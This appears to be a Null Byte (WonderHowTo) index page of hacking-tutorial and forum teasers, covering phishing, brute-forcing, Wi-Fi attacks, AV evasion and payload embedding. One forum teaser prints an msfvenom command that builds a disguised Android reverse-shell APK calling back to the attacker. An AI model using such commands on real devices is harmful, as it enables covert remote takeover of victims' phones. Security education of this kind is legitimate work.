Header Banner
wonderhowto.mark.png
Gadget Hacks Next Reality Food Hacks Null Byte The Secret Yumiverse Invisiverse Macgyverisms Mind Hacks Mad Science Lock Picking Driverless
How To Do Kali
Security camera mounted on a building.
HOW TO
02/14/2025 6:36 pm

How to Intercept Images from a Security Camera Using Wireshark

It's common for IoT devices like Wi-Fi security cameras to host a website for controlling or configuring the camera that uses HTTP instead of the more secure HTTPS. This means anyone with the network password can see traffic to and from the camera, allowing a hacker to intercept security camera foot ...more

Digital illustration of an eye overlaying a world map, symbolizing global vision or oversight.
HOW TO
02/14/2025 6:33 pm

How to Easily Detect CVEs with Nmap Scripts

Nmap is possibly the most widely used security scanner of its kind, in part because of its appearances in films such as The Matrix Reloaded and Live Free or Die Hard. Still, most of Nmap's best features are under-appreciated by hackers and pentesters, one of which will improve one's abilities to qui ...more

Code snippet showcasing Python programming.
HOW TO
02/14/2025 6:12 pm

An Intro to Vim, the Unix Text Editor Every Hacker Should Be Familiar With

As pentesters and hackers, we're going to be working with text frequently — wordlists, configuration files, etc. A lot of this we'll be doing on our machine, where we have access to whatever editor we prefer. The rest of it will be on remote machines, where the tools for editing will be limited. If ...more

636807495536935129.jpg
HOW TO
02/14/2025 6:01 pm

How to Locate and Exploit Devices Vulnerable to the Libssh Security Flaw

Computers all over the world rely on a program called "libssh" to use the SSH communications protocol, which allows trusted users to log in and administer computers remotely. Due to a flaw in libssh, fooling a computer into granting SSH access is as easy as telling it you already have permission. Th ...more

636751596298574714.jpg
HOW TO
02/14/2025 5:52 pm

How to Exploit Recycled Credentials with H8mail to Break into User Accounts

Many online users worry about their accounts being breached by some master hacker, but the more likely scenario is falling victim to a bot written to use leaked passwords in data breaches from companies like LinkedIn, MySpace, and Tumblr. For instance, a tool called H8mail can search through over 1 ...more

Raspberry Pi network scanning tool output displayed in terminal.
HOW TO
09/11/2023 5:33 pm

Discover & Attack Raspberry Pis Using Default Credentials with Rpi-hunter

When setting up a Raspberry Pi, it's easy to overlook changing the default password. Like many IoT devices, the Raspberry Pi's default Raspbian operating system installs with a widely-known default password, leaving the device vulnerable to remote access. Using a tool called rpi-hunter, hackers can ...more

Computer screens displaying coding and data analysis on a blue background.
HOW TO
06/30/2021 12:00 pm

Up Your Linux Game with This $19.99 Bundle

When we think about operating systems, we tend to view them from the perspective of a user. After all, most of us have spent a substantial amount of time on our computers, and so we've become more than acquainted with the ins and outs of whatever system we have running on our personal device. But th ...more

Xerodeploit logo in stylized text.
HOW TO
06/08/2021 4:44 pm

Perform Advanced Man-in-the-Middle Attacks with Xerosploit

A man-in-the-middle attack, or MitM attack, is when a hacker gets on a network and forces all nearby devices to connect to their machine directly. This lets them spy on traffic and even modify certain things. Bettercap is one tool that can be used for these types of MitM attacks, but Xerosploit can ...more

Kali Linux desktop environment with terminal window open.
HOW TO
04/23/2021 11:35 pm

How to Get Started with Kali Linux in 2020

Kali Linux has come a long way since its BackTrack days, and it's still widely considered the ultimate Linux distribution for penetration testing. The system has undergone quite the transformation since its old days and includes an updated look, improved performance, and some significant changes to ...more

Kali Linux boot menu screen.
HOW TO
04/23/2021 11:31 pm

Use Kali Linux as a Portable Live USB for Pen-Testing & Hacking on Any Computer

Kali Linux is the go-to Linux distribution for penetration testing and ethical hacking. Still, it's not recommended for day-to-day use, such as responding to emails, playing games, or checking Facebook. That's why it's better to run your Kali Linux system from a bootable USB drive. The hacker-friend ...more

Pirate-themed wireless router on a table
HOW TO
03/18/2021 4:53 pm

How to Use a Raspberry Pi as a Dead Drop for Anonymous Offline Communication

A PirateBox creates a network that allows users to communicate wirelessly, connecting smartphones and laptops even when surrounding infrastructure has been disabled on purpose or destroyed in a disaster. Using a Raspberry Pi, we will make a wireless offline server that hosts files and a chat room as ...more

Wi-Fi network selection menu on a computer showing available networks.
HOW TO
03/05/2021 1:55 am

There Are Hidden Wi-Fi Networks All Around You — These Attacks Will Find Them

There are hidden Wi-Fi networks all around you — networks that will never show up in the list of available unlocked and password-protected hotspots that your phone or computer can see — but are they more secure than regular networks that broadcast their name to any nearby device? The short answer is ...more

Code snippet for establishing an SSH connection with password input.
HOW TO
02/20/2021 12:13 am

Automate Remote SSH Control of Computers with Expect Scripts

If you're getting into automation, Bash scripting is usually the way to go. However, there are a couple of limitations, and one of them is logging into another device like a Raspberry Pi and running a script automatically. To help in those situations, we're going to automate delivering an SSH payloa ...more

Terminal window displaying a command line interaction with user inputs and outputs.
HOW TO
02/10/2021 12:11 am

Write Your Own Bash Scripts to Automate Tasks on Linux

Bash scripting is a convenient way to automate things on any Linux system, and we're going to use it here to automate certain tasks we use all the time. Bash is a simple language for stringing together several different Linux utilities. Its simplicity makes it easy for beginners to create lots of sc ...more

ProtonMail login screen with username and password fields.
HOW TO
12/29/2020 5:05 pm

Phish for Social Media & Other Account Passwords with BlackEye

Social media accounts are a favorite target for hackers, and the most effective tactics for attacking accounts on websites like Facebook, Instagram, and Twitter are often based on phishing. These password-stealing attacks rely on tricking users into entering their passwords into a convincing fake we ...more

A computer programming setup with coding displayed on a monitor and mannequins in the background.
HOW TO
12/22/2020 5:06 pm

How to Hack Wi-Fi: Build a Software-Based Wi-Fi Jammer with Airgeddon

Airgeddon is a multi-Bash network auditor capable of Wi-Fi jamming. This capability lets you target and disconnect devices from a wireless network, all without joining it. It runs on Kali, and we'll cover installing, configuring, and using its jamming functionalities on a small, inexpensive Raspberr ...more

Computer terminal displaying network commands and status messages.
HOW TO
12/22/2020 1:47 am

How to Hack Wi-Fi: Automating Wi-Fi Hacking with Besside-ng

Besside-ng is the hidden gem of the Aircrack-ng suite of Wi-Fi hacking tools. When run with a wireless network adapter capable of packet injection, Besside-ng can harvest WPA handshakes from any network with an active user — and crack WEP passwords outright. Unlike many tools, it requires no special ...more

Code output displaying Bitcoin addresses and balances.
HOW TO
11/24/2020 12:45 am

Extract Bitcoin Wallet Addresses & Balances from Websites with SpiderFoot CLI

While there are completely legitimate reasons to use Bitcoin, it's also used by terrorists, drug dealers, and other shady people that need to be investigated. That's where SpiderFoot comes in, which has a command-line interface to search for Bitcoin wallet addresses on a website and query the balanc ...more

Laptop displaying a video with a Linux Mint logo.
HOW TO
11/18/2020 11:36 pm

Pop a Reverse Shell with a Fake MP4 by Exploiting Popular Linux File Managers

What appears to be an ordinary MP4 may have been designed by an attacker to compromise your Linux Mint operating system. Opening the file will indeed play the intended video, but it will also silently create a connection to the attacker's system. Understanding the AttackWhile this article uses Linux ...more

Robotic hand holding a Rubik's Cube
FORUM
11/13/2020 3:45 pm

Learn to Hack an Android Device Over the Internet Remotely

Hi there! I'm Joash Jeshurun & this is my first writing on this website. Today, in this post I'll reveal how hackers try to gain access into Android devices and cause disastrous effects. Today's world seems to be completely connected under the influence of the Internet (International Network). I ...more

FORUM
11/11/2020 1:10 pm

Why Can't I Boot into Kali Graphical Mode After a Fresh Installation??

I installed kali Linux on my desktop selecting gdm3 and it worked perfect after the installation. However after I have updated and upgraded, I restarted my pc and it gets stuck with a queue of lines ending with "started gnome display manager". After I press Alt + F2 I can login using my details. I t ...more

Data flow diagram illustrating the interaction between a data source and data processing server.
FORUM
11/09/2020 3:49 pm

How to: Spoof E-Mail Using SendEmail and Postfix

Hello, fellow hackers! Today I am going to show you just how easy it is to spoof E-Mails and impersonate any E-Mail address. Because of how easy it is to do, anyone with five minutes of free time can send malicious E-Mails to you while pretending to be your boss, teacher, SO, etc. You can probably g ...more

FORUM
11/08/2020 11:01 am

Difficulty with Kali Linux Commands

Hello techies? I'm using Debian, Kali to be exact. Whenever I try sudo su, it executes the /usr/bin/zsh and I don't know how I set this or how to bring it back to normal. Someone to hel ...more

FORUM
11/08/2020 10:59 am

Kali linux command error. Kindly help

Hello techies? I'm using Debian, Kali to be exact. Whenever I try sudo su, it executes the /usr/bin/zsh and I don't know how I set this or how to bring it back to normal. Someone to help ...more

Terminal output showing wireless network configuration and settings.
FORUM
11/05/2020 2:00 pm

Does rtl8814au Is Still Work For Wireless Hacking?

I'm trying to use Alfa awus1900 for WiFi hacking bit it doesn't does the job and after turning on monitor mode the still shows as wlan0 in both the modes in monitorias well as manager mode so do some kindly help me with the homework And I'm using kali Linus 2020.03 with all updated ...more

Network testing equipment connected to a data switch.
HOW TO
10/21/2020 11:35 pm

Use Banner Grabbing to Aid in Reconnaissance

As we've seen with other tools and utilities, administrators typically use certain things to do their job more efficiently, and those things are often abused by attackers for exploitation. After all, hacking is just the process of getting a computer to do things in unexpected ways. Today, we will be ...more

A digital representation of a hand emerging from a laptop, symbolizing technology and innovation.
HOW TO
10/16/2020 11:41 pm

Upgrade a Dumb Shell to a Fully Interactive Shell for More Flexibility

One of the most exciting things as an ethical hacker, in my opinion, is catching a reverse shell. But often, these shells are limited, lacking the full power and functionality of a proper terminal. Certain things don't work in these environments, and they can be troublesome to work with. Luckily, wi ...more

Close-up of a finger pointing at a data table on a digital screen.
HOW TO
10/08/2020 12:03 am

Brute-Force FTP Credentials & Get Server Access

Hackers often find fascinating files in the most ordinary of places, one of those being FTP servers. Sometimes, luck will prevail, and anonymous logins will be enabled, meaning anyone can just log in. But more often than not, a valid username and password will be required. But there are several meth ...more

Screenshot of a webpage displaying file management details, including file names, paths, sizes, and actions.
HOW TO
09/30/2020 12:20 am

Analyze Web Browser Extensions for Possible Malware & Other Malicious Activity

Browser extensions are extremely useful since they can expand web browsers like Google Chrome and Mozilla Firefox beyond their built-in features. However, we don't always know who's behind a browser add-on or what it's doing beyond what's advertised. That's where ExtAnalysis comes into play. ExtAnal ...more

Futuristic data center with glowing blue lines and abstract digital patterns.
HOW TO
09/25/2020 10:08 pm

Attack Web Applications with Burp Suite & SQL Injection

Web applications are becoming more and more popular, replacing traditional desktop programs at an accelerated rate. With all these new apps out on the web comes various security implications associated with being connected to the internet where anyone can poke and prod at them. One of the simplest, ...more

Command line interface showing terminal commands in various colors.
HOW TO
09/14/2020 9:17 pm

Identify & Abuse Sudo Misconfigurations with SUDO_KILLER

Sudo is a necessity on most Linux systems, most of which are probably being used as web servers. While the principle of least privilege is typically applied, sudo misconfigurations can easily lead to privilege escalation if not properly mediated. Which brings us to SUDO_KILLER, a tool used to identi ...more

Device list displayed on a mobile device screen.
HOW TO
09/03/2020 7:30 pm

How & Why You Should Change Your iPhone's Name

You might be giving out your name to every stranger you see, and you don't even know it. That iPhone of yours has a name — generally a combination of your first name and device model — and it broadcasts it to others via AirDrop, Personal Hotspot, Bluetooth, Wi-Fi, and other connections. Sure, it's u ...more

FORUM
09/03/2020 4:13 am

How to decrypt .CAP file of handshake during WiFi attack

I'm new to Linux, and recently tried WiFi hacking with the built-in tool in kali Linux i.e Wifite. I managed to capture handshake file. But the application couldn't crack the password with the help of brute force. Is there any other way I can decrypt the password from the .CAP file generated??? Plea ...more

Close-up of a computer keyboard.
HOW TO
09/02/2020 11:30 pm

Use Linux Smart Enumeration to Discover Paths to Privesc

Privilege escalation is the technique used to exploit certain flaws to obtain elevated permissions relative to the current user. There are a vast number of methods out there to go from user to root on Linux, and keeping track of them all can be difficult. This is where automation comes into play, an ...more

Computer screen displaying coding interface with the title "CHIMERA" and programming details.
HOW TO
09/01/2020 4:21 pm

Bypass VirusTotal & AMSI Detection Signatures on Windows with Chimera

Microsoft's built-in antimalware solution does its best to prevent common attacks. Unfortunately for Windows 10 users, evading detection requires almost no effort at all. An attacker armed with this knowledge will easily bypass security software using any number of tools. As Microsoft's antimalware ...more

Cartoon pirate skeleton working on a computer.
FORUM
09/01/2020 12:45 pm

How to Remote Access a Android with PAYLOAD

First we needed to create a payloadwe can do this by executing the following command in Kali linux Terminal msfvenom -p android/meterpreter/reverse_tcp lhost=(your ip adress,get by typing ifconfig or sudo ifconfig in terminal) lport=4444 R > /home/kali/google files.apk then open metasploitmsfcons ...more

FORUM
09/01/2020 8:49 am

How Do I Reinstall Kali Linux to "Undo" Some n00b Mistakes?.

I've been trying to get the hang of Kali Linux as a command line virgin, and as expected I made a mistake by editing some file I wasn't supposed to. Everytime I would update/install I would get Ignoring file 'some-ppa.list.save.1' in directory '/etc/apt/sources.list.d/' as it has an invalid filename ...more

FORUM
08/29/2020 5:41 am

I Had a Doubt?

i'm new to this it's may silly if i install kali linux it will erase my hard disk and my windows ? ...more

Code snippet of HTML navigation structure.
HOW TO
08/28/2020 11:21 pm

Exploit WebDAV on a Server & Get a Shell

The internet has undoubtedly changed the way we work and communicate. With technological advances, more and more people can collaborate on the web from anywhere in the world. But this remote-friendly environment inherently brings security risks, and hackers are always finding ways to exploit systems ...more

Mechanical counter displaying numbers.
HOW TO
08/27/2020 11:07 pm

Fuzz Parameters, Directories & More with Ffuf

The art of fuzzing is a vital skill for any penetration tester or hacker to possess. The faster you fuzz, and the more efficiently you are at doing it, the closer you come to achieving your goal, whether that means finding a valid bug or discovering an initial attack vector. A tool called ffuf comes ...more

FORUM
08/27/2020 9:03 am

How Can I Access the Files in My Phone's Internal Storage Using Kali?

I have download Kali Linux on Android. I was trying "How to hack android remotely" tutorial. But, after creating the app file, I was not able to locate it. It was not in my phone's internal memory. It was in the root folder. I tried to copy it into my phone's internal memory, but I was not able to f ...more

FORUM
08/24/2020 2:23 am

Kali Linux on Headless RPI4

Last week I flashed Offensive Security's latest release of Kali Linux (2020.3) for Raspberry PI 4 and have spent probably close to 10 hours now trying to get it to connect to my 2.4G wireless network to no avail. I can get it to connect after login (when I login using my screen and keyboard), and ca ...more

Cartoon pufferfish underwater with colorful coral background.
HOW TO
08/21/2020 11:49 pm

Set Up the Ultra-Secure Operating System OpenBSD in VirtualBox

OpenBSD implements security in its development in a way that no other operating system on the planet does. Learning to use the Unix-like operating system can help a hacker understand secure development, create better servers, and improve their understanding of the BSD operating system. Using Virtual ...more

Antivirus software dashboard displaying protection status.
HOW TO
08/19/2020 9:16 pm

How to Identify Antivirus & Firewall Software Installed on Someone's MacBook

Identifying security software installed on a MacBook or other Apple computer is important to hackers and penetration testers needing to compromise a device on the network. With man-in-the-middle attacks, packets leaving the Mac will tell us a lot about what kind of antivirus and firewall software is ...more

Combination lock on a wooden surface.
HOW TO
08/17/2020 9:13 pm

Crack RAR, ZIP, PDF & Linux Shadow Files with Zydra

Everybody knows not to store sensitive information in unencrypted files, right? PDFs and ZIP files can often contain a treasure trove of information, such as network diagrams, IP addresses, and login credentials. Sometimes, even certain files that are encrypted aren't safe from attackers. That's whe ...more

Password input field with masked characters.
FORUM
08/15/2020 9:09 pm

How to: Crack Instagram Passwords Using Instainsane

Instagram is one of the most widely used social media applications. I am pretty confident that at least one of your friends or you are using it pretty much everyday. Today I am going to show you how a hacker could crack someone's Instagram password using a script called Instainsane. Download Instai ...more

Radar chart displaying data with numeric values and a corresponding log on the side.
HOW TO
08/15/2020 12:01 am

How to Conduct Wireless Recon on Bluetooth, Wi-Fi & GPS with Sparrow-wifi

If you're ever in a situation where you need to take a peek at the wireless spectrum, whether it's for Bluetooth or Wi-Fi devices, there's a fascinating Python 3-based tool called Sparrow-wifi you should check out. It's cross-platform, easy to use, and has an impressive GUI that shows you the signal ...more

Disk management software interface for partition resizing.
FORUM
08/13/2020 8:47 pm

Kali Linux Persistence Error: No Solution on Internet

Hi Null Byte,After going through numerous articles, forums and videos all over internet, i can not find any help on the subject .Brief of problem: Trying to make kali linux persistent usb. Getting boot error in persistence mode.Details: Following procedure was adopted to make persistent live usb USB ...more

Vintage keys displayed on a wooden surface.
HOW TO
08/11/2020 6:33 pm

Gain SSH Access to Servers by Brute-Forcing Credentials

SSH is one of the most common protocols in use in modern IT infrastructures, and because of this, it can be a valuable attack vector for hackers. One of the most reliable ways to gain SSH access to servers is by brute-forcing credentials. There are a few methods of performing an SSH brute-force atta ...more

Close-up of a laptop screen displaying programming code in green text on a dark background.
HOW TO
08/07/2020 1:27 am

Host a Deep Web IRC Server for More Anonymous Chatting

Internet Relay Chat, or IRC, is one of the most popular chat protocols on the internet. The technology can be connected to the Tor network to create an anonymous and secure chatroom — without the use of public IP addresses. IRC servers allow one to create and manage rooms, users, and automated funct ...more

FORUM
08/06/2020 3:33 am

Does Arp Spoofing Needs Monitor Mode?

i donot have a external wireless adapter that supports monitor mode and i wanted to practise MITM attacks so i wanted to know does MITM attack needs monitor mode to be enabled? i am using kali on vmware i can perform attack on another virtual os on my pc with nat but can i attack other device on my ...more

Mobile phone displaying code related to "Arcane."
HOW TO
08/04/2020 4:11 pm

How to Embed Payloads into iPhone Packages with Arcane

It's a common misconception that iPhones are impervious to cyberattacks and "more secure" than Android. And when an iPhone does get hacked, it's nearly impossible to tell that it happened. Vulnerabilities in iOS are common, and Apple tries to tackle them with each security update it releases. To get ...more